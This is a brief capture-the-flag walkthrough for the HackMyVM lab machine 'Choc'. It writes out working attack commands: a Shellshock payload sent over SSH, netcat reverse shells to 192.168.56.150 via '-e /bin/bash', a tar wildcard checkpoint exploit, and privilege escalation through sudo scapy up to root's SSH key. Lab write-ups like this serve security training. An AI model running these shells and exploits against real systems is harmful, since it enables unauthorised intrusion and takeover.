https://hackmyvm.eu/machines/machine.php?vm=Choc
Nmap scan ports, only 21 and 22 are open.
nmap -sV -sC -p- -oN ports.log 192.168.56.100
Login ftp as anonymous, get id_rsa.
Try ssh, get user name "carl".
Try to login ssh as "carl" with the id_rsa, the vm displayed a message and quit.
Try bash shellshock exploit through ssh. Listen at port 1234 in one terminal, ssh login in another terminal.
ssh carl@192.168.56.100 -i id_rsa '() { :;}; nc 192.168.56.150 1234 -e /bin/bash
Use python pty to get interactive shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
There are 3 users in home folder.
In torki's home, find secret_garden/diary.txt.
There is a backup.sh file, which we can not read now.
Try to find files belong to user torki, find /tmp/backup_home.tgz.
find / -user torki 2>/dev/null
Use tar -xvf to unzip it, it's diary.txt.
Now we can use tar wildcard exploit.
Listen port 2234 at one terminal, and create 3 files in /home/torki/secret_garden.
Wait 1 minute, we will get reverse shell.
echo '' > secret_garden/--checkpoint=1 echo '' > 'secret_garden/--checkpoint-action=exec=sh pwn.sh' echo 'nc 192.168.56.150 2234 -e /bin/bash' > secret_garden/pwn.sh chmod +x secret_garden/pwn.sh
In /home/torki/.ssh, get id_rsa, now we can login ssh as torki.
Check sudo -l, we can escate to user sarah.
Run sudo -u sarah /usr/bin/scapy, in scapy interactive mode, run 'import pty;pty.spawn("/bin/bash")'.
Check sudo -l again.
Now we can get /root/.ssh/id_rsa.
And get root finally.